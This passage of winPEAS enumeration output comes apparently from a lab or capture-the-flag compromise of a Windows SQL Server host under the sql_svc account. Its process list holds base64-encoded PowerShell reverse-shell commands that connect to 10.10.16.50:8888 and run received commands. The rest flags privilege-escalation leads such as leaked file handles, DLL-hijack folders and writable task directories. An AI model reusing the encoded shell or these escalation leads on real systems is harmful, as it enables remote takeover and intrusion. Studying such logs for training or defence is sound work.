G0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcA
ZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwB
rACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAG
cAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAU
wAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0
AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGU
AdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdA
BlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApA
DsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUA
KAApAA==

===================================================================================
==============

sqlservr(1652)[C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\

Binn\sqlservr.exe] -- POwn: sql_svc

Command Line: "C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\

Binn\sqlservr.exe" -sMSSQLSERVER

===================================================================================
==============

powershell(744)[C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe] --
POwn: sql_svc
Command Line: powershell -e
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAA
uAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANQAwAC
IALAA4ADgAOAA4ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAc
gBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1
AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACg
AJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIA
AwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhA
G0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcA
ZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwB
rACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAG
cAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAU
wAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0
AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGU
AdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdA
BlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApA
DsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUA
KAApAA==

===================================================================================
==============

ssh-keygen(2344)[C:\Windows\System32\OpenSSH\ssh-keygen.exe] -- POwn: sql_svc

Command Line: "C:\Windows\System32\OpenSSH\ssh-keygen.exe" -t rsa -f mykey

===================================================================================
==============

powershell(1800)[C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe] --
POwn: sql_svc
Command Line: powershell -e
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAA
uAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANQAwAC
IALAA4ADgAOAA4ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAc
gBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1
AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACg
AJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIA
AwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhA
G0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcA
ZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwB
rACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAG
cAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAU
wAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0
AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGU
AdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdA
BlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApA
DsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUA
KAApAA==

===================================================================================
==============

conhost(2952)[C:\Windows\system32\conhost.exe] -- POwn: sql_svc

Command Line: \??\C:\Windows\system32\conhost.exe 0x4

===================================================================================
==============

conhost(2680)[C:\Windows\system32\conhost.exe] -- POwn: sql_svc

Command Line: \??\C:\Windows\system32\conhost.exe 0x4
===================================================================================
==============

winpeas(4064)[C:\Users\Public\winpeas.exe] -- POwn: sql_svc -- isDotNet

Permissions: sql_svc [AllAccess], Service [WriteData/CreateFiles]
Possible DLL Hijacking folder: C:\Users\Public (Service
[WriteData/CreateFiles])
Command Line: "C:\Users\Public\winpeas.exe"

===================================================================================
==============

???????????? Vulnerable Leaked Handlers

? https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#leaked-handlers

? Getting Leaked Handlers, it might take some time...

===================================================================================
==============

Handle: 2580(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
mastlog.ldf
File Owner: BUILTIN\Administrators

===================================================================================
==============

Handle: 2764(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
MSDBLog.ldf
File Owner: BUILTIN\Administrators

===================================================================================
==============

===================================================================================
==============
Handle: 2836(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
model.mdf
File Owner: BUILTIN\Administrators

===================================================================================
==============

Handle: 2916(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
tempdb.mdf
File Owner: BUILTIN\Administrators

===================================================================================
==============

Handle: 2920(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
modellog.ldf
File Owner: BUILTIN\Administrators

===================================================================================
==============

Handle: 2928(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
templog.ldf
File Owner: BUILTIN\Administrators

===================================================================================
==============

===================================================================================
==============
Handle: 2580(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
mastlog.ldf
File Owner: BUILTIN\Administrators

===================================================================================
==============

Handle: 2836(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
model.mdf
File Owner: BUILTIN\Administrators

===================================================================================
==============

Handle: 2796(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
MSDBData.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============

===================================================================================
==============

Handle: 2328(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
master.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============

===================================================================================
==============

===================================================================================
==============
Handle: 2328(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
master.mdf
File Owner: BUILTIN\Administrators

===================================================================================
==============

===================================================================================
==============
Handle: 2920(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
modellog.ldf
File Owner: BUILTIN\Administrators

===================================================================================
==============

Handle: 2940(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
tempdb_mssql_2.ndf
File Owner: BUILTIN\Administrators
===================================================================================
==============

????????????????????????????????????? Services
Information ?????????????????????????????????????

???????????? Interesting Services -non Microsoft-

? Check if you can overwrite some service binary or perform a DLL hijacking, also
check for unquoted paths https://book.hacktricks.wiki/en/windows-hardening/windows-
local-privilege-escalation/index.html#services
ssh-agent(OpenSSH Authentication Agent)[C:\Windows\System32\OpenSSH\ssh-
agent.exe] - Disabled - Stopped
Agent to hold private keys used for public key authentication.

===================================================================================
==============

VGAuthService(VMware, Inc. - VMware Alias Manager and Ticket Service)["C:\

Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"] - Auto -
Running
Alias Manager and Ticket Service

===================================================================================
==============

vm3dservice(VMware, Inc. - VMware SVGA Helper Service)[C:\Windows\system32\

vm3dservice.exe] - Auto - Running
Helps VMware SVGA driver by collecting and conveying user mode information

===================================================================================
==============

VMTools(VMware, Inc. - VMware Tools)["C:\Program Files\VMware\VMware Tools\

vmtoolsd.exe"] - Auto - Running
Provides support for synchronizing objects between the host and guest operating
systems.

===================================================================================
==============

???????????? Modifiable Services

? Check if you can modify any service https://book.hacktricks.wiki/en/windows-
hardening/windows-local-privilege-escalation/index.html#services

You cannot modify any service

???????????? Looking if you can modify any service registry

? Check if you can modify the registry of a service
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#services-registry-modify-permissions

[-] Looks like you cannot change the registry of any service...

???????????? Checking write permissions in PATH folders (DLL Hijacking)

? Check for DLL Hijacking in PATH folders https://book.hacktricks.wiki/en/windows-
hardening/windows-local-privilege-escalation/index.html#dll-hijacking
C:\Windows\system32
C:\Windows
C:\Windows\System32\Wbem
C:\Windows\System32\WindowsPowerShell\v1.0\
C:\Windows\System32\OpenSSH\
C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\130\Tools\Binn\
C:\Program Files (x86)\Microsoft SQL Server\140\Tools\Binn\
C:\Program Files\Microsoft SQL Server\140\Tools\Binn\
C:\Program Files\Microsoft SQL Server\140\DTS\Binn\

????????????????????????????????????? Applications
Information ?????????????????????????????????????

???????????? Current Active Window Application

[X] Exception: Object reference not set to an instance of an object.

???????????? Installed Applications --Via Program Files/Uninstall registry--

? Check if you can modify installed software
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#applications

C:\Program Files\common files

C:\Program Files\desktop.ini
C:\Program Files\internet explorer
C:\Program Files\Microsoft SQL Server
C:\Program Files\Microsoft Visual Studio 10.0
C:\Program Files\Microsoft.NET
C:\Program Files\Uninstall Information
C:\Program Files\VMware
C:\Program Files\Windows Defender
C:\Program Files\Windows Defender Advanced Threat Protection
C:\Program Files\WindowsApps
C:\Program Files\WindowsPowerShell

???????????? Autorun Applications

? Check if you can modify other users AutoRuns binaries (Note that is normal that
you can modify HKCU registry and binaries indicated there)
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/privilege-escalation-with-autorun-binaries.html

RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Key: VMware User Process
Folder: C:\Program Files\VMware\VMware Tools
File: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe -n vmusr (Unquoted and
Space detected) - C:\

===================================================================================
==============

RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

Key: Common Startup
Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

===================================================================================
==============

RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell

Folders
Key: Common Startup
Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

===================================================================================
==============

RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

Key: Userinit
Folder: C:\Windows\system32
File: C:\Windows\system32\userinit.exe,

===================================================================================
==============

RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

Key: Shell
Folder: None (PATH Injection)
File: explorer.exe

===================================================================================
==============

RegPath: HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot
Key: AlternateShell
Folder: None (PATH Injection)
File: cmd.exe

===================================================================================
==============

RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Font Drivers

Key: Adobe Type Manager
Folder: None (PATH Injection)
File: atmfd.dll

===================================================================================
==============

RegPath: HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Font

Drivers
Key: Adobe Type Manager
Folder: None (PATH Injection)
File: atmfd.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: _wow64cpu
Folder: None (PATH Injection)
File: wow64cpu.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: _wowarmhw
Folder: None (PATH Injection)
File: wowarmhw.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: _xtajit
Folder: None (PATH Injection)
File: xtajit.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: advapi32
Folder: None (PATH Injection)
File: advapi32.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: clbcatq
Folder: None (PATH Injection)
File: clbcatq.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: combase
Folder: None (PATH Injection)
File: combase.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: COMDLG32
Folder: None (PATH Injection)
File: COMDLG32.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: coml2
Folder: None (PATH Injection)
File: coml2.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: DifxApi
Folder: None (PATH Injection)
File: difxapi.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: gdi32
Folder: None (PATH Injection)
File: gdi32.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: gdiplus
Folder: None (PATH Injection)
File: gdiplus.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: IMAGEHLP
Folder: None (PATH Injection)
File: IMAGEHLP.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: IMM32
Folder: None (PATH Injection)
File: IMM32.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: kernel32
Folder: None (PATH Injection)
File: kernel32.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: MSCTF
Folder: None (PATH Injection)
File: MSCTF.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: MSVCRT
Folder: None (PATH Injection)
File: MSVCRT.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: NORMALIZ
Folder: None (PATH Injection)
File: NORMALIZ.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: NSI
Folder: None (PATH Injection)
File: NSI.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: ole32
Folder: None (PATH Injection)
File: ole32.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: OLEAUT32
Folder: None (PATH Injection)
File: OLEAUT32.dll

===================================================================================
==============
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: PSAPI
Folder: None (PATH Injection)
File: PSAPI.DLL

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: rpcrt4
Folder: None (PATH Injection)
File: rpcrt4.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: sechost
Folder: None (PATH Injection)
File: sechost.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: Setupapi
Folder: None (PATH Injection)
File: Setupapi.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: SHCORE
Folder: None (PATH Injection)
File: SHCORE.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: SHELL32
Folder: None (PATH Injection)
File: SHELL32.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: SHLWAPI
Folder: None (PATH Injection)
File: SHLWAPI.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: user32
Folder: None (PATH Injection)
File: user32.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: WLDAP32
Folder: None (PATH Injection)
File: WLDAP32.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: wow64
Folder: None (PATH Injection)
File: wow64.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: wow64win
Folder: None (PATH Injection)
File: wow64win.dll

===================================================================================
==============

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls

Key: WS2_32
Folder: None (PATH Injection)
File: WS2_32.dll

===================================================================================
==============

RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{89820200-

ECBD-11cf-8B85-00AA005B4340}
Key: StubPath
Folder: None (PATH Injection)
File: U

===================================================================================
==============
RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{89B4C1CD-
B018-4511-B0A1-5476DBF70820}
Key: StubPath
Folder: C:\Windows\System32
File: C:\Windows\System32\Rundll32.exe C:\Windows\System32\mscories.dll,Install

===================================================================================
==============

RegPath: HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\

{89B4C1CD-B018-4511-B0A1-5476DBF70820}

Key: StubPath
Folder: C:\Windows\SysWOW64
File: C:\Windows\SysWOW64\Rundll32.exe C:\Windows\SysWOW64\mscories.dll,Install

===================================================================================
==============

Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

File: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
Potentially sensitive file content: LocalizedResourceName=@%SystemRoot%\
system32\shell32.dll,-21787

===================================================================================
==============

Folder: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\

Startup
FolderPerms: sql_svc [AllAccess]
File: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Startup\desktop.ini (Unquoted and Space detected) - C:\Users\sql_svc\AppData\
Roaming\Microsoft\Windows,C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup\desktop.ini

FilePerms: sql_svc [AllAccess]

Potentially sensitive file content: LocalizedResourceName=@%SystemRoot%\
system32\shell32.dll,-21787

===================================================================================
==============

Folder: C:\windows\tasks
FolderPerms: Authenticated Users [WriteData/CreateFiles]

===================================================================================
==============

Folder: C:\windows\system32\tasks
FolderPerms: Authenticated Users [WriteData/CreateFiles]

===================================================================================
==============

Folder: C:\windows
File: C:\windows\system.ini

===================================================================================
==============

Folder: C:\windows
File: C:\windows\win.ini

===================================================================================
==============

Key: From WMIC

Folder: C:\Program Files\VMware\VMware Tools
File: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe -n vmusr

===================================================================================
==============

???????????? Scheduled Applications --Non Microsoft--

? Check if you can modify other users scheduled binaries
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/privilege-escalation-with-autorun-binaries.html

???????????? Device Drivers --Non Microsoft--

? Check 3rd party drivers for known vulnerabilities/rootkits.
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#drivers

QLogic Gigabit Ethernet - 7.12.31.105 [QLogic Corporation]: \\.\GLOBALROOT\

SystemRoot\System32\drivers\bxvbda.sys

QLogic 10 GigE - 7.13.65.105 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\

System32\drivers\evbda.sys
NVIDIA nForce(TM) RAID Driver - 10.6.0.23 [NVIDIA Corporation]: \\.\GLOBALROOT\
SystemRoot\System32\drivers\nvraid.sys

QLogic FastLinQ Ethernet - 8.33.20.103 [Cavium, Inc.]: \\.\GLOBALROOT\

SystemRoot\System32\drivers\qevbda.sys

VMware vSockets Service - 9.8.17.0 build-16460229 [VMware, Inc.]: \\.\

GLOBALROOT\SystemRoot\system32\DRIVERS\vsock.sys

VMware PCI VMCI Bus Device - 9.8.16.0 build-14168184 [VMware, Inc.]: \\.\
GLOBALROOT\SystemRoot\System32\drivers\vmci.sys

Intel Matrix Storage Manager driver - 8.6.2.1019 [Intel Corporation]: \\.\

GLOBALROOT\SystemRoot\System32\drivers\iaStorV.sys

LSI SSS PCIe/Flash Driver (StorPort) - 2.10.61.81 [LSI Corporation]: \\.\

GLOBALROOT\SystemRoot\System32\drivers\lsi_sss.sys
QLogic BR-series FC/FCoE HBA Stor Miniport Driver - 3.2.26.1 [QLogic
Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bfadi.sys

QLogic BR-series FC/FCoE HBA Stor Miniport Driver - 3.2.26.1 [QLogic

Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bfadfcoei.sys

Emulex WS2K12 Storport Miniport Driver x64 - 11.0.247.8000 01/26/2016 WS2K12 64

bit x64 [Emulex]: \\.\GLOBALROOT\SystemRoot\System32\drivers\elxfcoe.sys

Emulex WS2K12 Storport Miniport Driver x64 - 11.4.225.8009 11/15/2017 WS2K12 64

bit x64 [Broadcom]: \\.\GLOBALROOT\SystemRoot\System32\drivers\elxstor.sys

QLogic iSCSI offload driver - 8.33.5.2 [QLogic Corporation]: \\.\GLOBALROOT\

SystemRoot\System32\drivers\qeois.sys

QLogic Fibre Channel Stor Miniport Driver - 9.1.15.1 [QLogic Corporation]: \\.\
GLOBALROOT\SystemRoot\System32\drivers\ql2300i.sys

QLA40XX iSCSI Host Bus Adapter - 2.1.5.0 (STOREx wx64) [QLogic

Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\ql40xx2i.sys

QLogic FCoE Stor Miniport Inbox Driver - 9.1.11.3 [QLogic Corporation]: \\.\
GLOBALROOT\SystemRoot\System32\drivers\qlfcoei.sys

Chelsio Communications iSCSI Controller - 10.0.10011.16384 [Chelsio

Communications]: \\.\GLOBALROOT\SystemRoot\System32\drivers\cht4sx64.sys

LSI 3ware RAID Controller - WindowsBlue [LSI]: \\.\GLOBALROOT\SystemRoot\

System32\drivers\3ware.sys
AHCI 1.3 Device Driver - 1.1.3.277 [Advanced Micro Devices]: \\.\GLOBALROOT\
SystemRoot\System32\drivers\amdsata.sys

Storage Filter Driver - 1.1.3.277 [Advanced Micro Devices]: \\.\GLOBALROOT\

SystemRoot\System32\drivers\amdxata.sys

AMD Technology AHCI Compatible Controller - 3.7.1540.43 [AMD Technologies

Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\amdsbs.sys

Adaptec RAID Controller - 7.5.0.32048 [PMC-Sierra, Inc.]: \\.\GLOBALROOT\

SystemRoot\System32\drivers\arcsas.sys

Windows (R) Win 7 DDK driver - 10.0.10011.16384 [Avago Technologies]: \\.\

GLOBALROOT\SystemRoot\System32\drivers\ItSas35i.sys

LSI Fusion-MPT SAS Driver (StorPort) - 1.34.03.83 [LSI Corporation]: \\.\

GLOBALROOT\SystemRoot\System32\drivers\lsi_sas.sys

Windows (R) Win 7 DDK driver - 10.0.10011.16384 [LSI Corporation]: \\.\

GLOBALROOT\SystemRoot\System32\drivers\lsi_sas2i.sys

MEGASAS RAID Controller Driver for Windows - 6.706.06.00 [Avago

Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\megasas.sys

Windows (R) Win 7 DDK driver - 10.0.10011.16384 [Avago Technologies]: \\.\

GLOBALROOT\SystemRoot\System32\drivers\lsi_sas3i.sys

MEGASAS RAID Controller Driver for Windows - 6.714.05.00 [Avago

Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\MegaSas2i.sys
MEGASAS RAID Controller Driver for Windows - 7.705.08.00 [Avago
Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\megasas35i.sys

MegaRAID Software RAID - 15.02.2013.0129 [LSI Corporation, Inc.]: \\.\

GLOBALROOT\SystemRoot\System32\drivers\megasr.sys

Marvell Flash Controller - 1.0.5.1016 [Marvell Semiconductor, Inc.]: \\.\

GLOBALROOT\SystemRoot\System32\drivers\mvumis.sys

NVIDIA nForce(TM) SATA Driver - 10.6.0.23 [NVIDIA Corporation]: \\.\GLOBALROOT\

SystemRoot\System32\drivers\nvstor.sys

MEGASAS RAID Controller Driver for Windows - 6.805.03.00 [Avago

Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\percsas2i.sys

Microsoftr Windowsr Operating System - 6.1.6918.0 [Silicon Integrated Systems]:

\\.\GLOBALROOT\SystemRoot\System32\drivers\sisraid4.sys

Promiser SuperTrak EX Series - 5.1.0000.10 [Promise Technology, Inc.]: \\.\

GLOBALROOT\SystemRoot\System32\drivers\stexstor.sys

VIA RAID driver - 7.0.9600,6352 [VIA Technologies Inc.,Ltd]: \\.\GLOBALROOT\

SystemRoot\System32\drivers\vsmraid.sys

VIA StorX RAID Controller Driver - 8.0.9200.8110 [VIA Corporation]: \\.\

